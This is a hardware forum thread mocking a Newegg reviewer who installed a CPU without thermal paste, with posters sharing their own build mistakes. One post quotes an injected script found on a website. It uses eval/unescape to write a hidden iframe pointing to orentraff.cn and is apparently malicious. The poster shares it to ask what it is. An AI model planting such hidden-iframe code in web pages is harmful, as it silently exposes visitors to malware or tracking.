Crazy Newegg reviewers.........

Post by HONkUS »

So im looking to buy a Q9450 and i was reading reviews on Newegg, this one really caught my eye so i felt like i had to share it with everyone:
Pros: This processor seemed like a good buy. It is 45 nm and a good clock speed. It should be relatively easy to OC. Vista64 runs quick and responsive, almost flawless in Oblivion at maxed settings.

Cons: My particular chip runs very hot. I am not using thermal paste, but i am using an Arctic 7 freezer pro cooler and a good case. My idle temps are 50-60 celcius and load temps hit 70. I expected it to be at least 10 degrees cooler... now i'm afraid to OC.

Other Thoughts: It could be i didn't install it properly... but thats pretty unlikely. All of the cores run at the same temp, with core 0 about 5 degrees hotter.
Wow.

What a complete and utter noob >_>

Why would they boldly proclaim such a stupid feat!

Shows how good intel are though if that thing is running ok with practically no thermal contact!

I bet he put "Tech level: High"

You would think that someone who is willing to pay that much for a processor would take the time to find out how to install the damn thing. I hope he burns it out.

nice nice ^^
Well I changed fans in my case once and accidentially removed the fan connector of the CPU :oops: It ran well for 5 min and then just crashed. I didn't realise what was going on though. so I tried to start is again with just a blank screen. After opening the case it kinda smelled funny and I noticed the connector hanging in mid air :oops: . Ah well my 6000 is still running^^

lucky for him you can get away with no thermal paste on these 45nm processors... I forgot to plug in the water cooler one time and ran about 20 minutes of benchmarks at 100% CPU load on a QX9770 and it didn't even throttle with just the CPU waterblock... Processors these days are almost fool proof... I bet money that guy left the plastic on the bottom of the CPU cooler too ;)

The Arctic Cooling Freezer 7 Pro came with thermal paste pre-applied... Did he wipe it off the heatsink?

Switched processors yesterday (E2160 -> E7200) and it kept locking up on boot-up. Apparently, I forgot to plug the EPS/ATX12V 4 pin back in (had to take it out so I could install the heatsink properly). :oops: At least I didn't forget the thermal paste. :)

But darn, stock HSF for E7200 is half the height of the one which came with my E2160.

Oh great. I bet the Newegg poster avoid the TIM paste due to this warning of it being too thick. So he removed it all together and mounded the cooler.

I hate the Intel plastic push-in twist pins. Dumb cheapo ITW products.

Those spammers sure are getting good at what they do...found some nasty hexcode in the source code that translates to something like

Code: Select all

<script type="text/javascript">
eval(unescape("document.write('<iframe src="http://orentraff.cn/in.cgi?5" width="0" height="0" style="display:none"></iframe>');"));
</script>
so I'm guessing it's some sort of spy or adware of one form or another...any enlightenments from the Java pros?

EDIT: didn't want to imply supremelaw is necessarily a spammer, a quick google search reveals loads of problems with the similar obfuscated code on other sites. When I say spammer, I meant the person who put that code there which from the looks of other sites probably wasn't supremelaw...

LOL I had a guy at work who build his own system at home and was freaking out cause his CPU was running at 65-75c and he has a HUGE heat sink on it. I go and find that he hadn't removed the protective plastic film on the contact part of the the heat sink =)

Did the plastic melt to the heatsink?

Actually it didn't. I just pealed it off leaving a nice clean mating surface. The look on his face for making such a bone headed mistake though was priceless =)
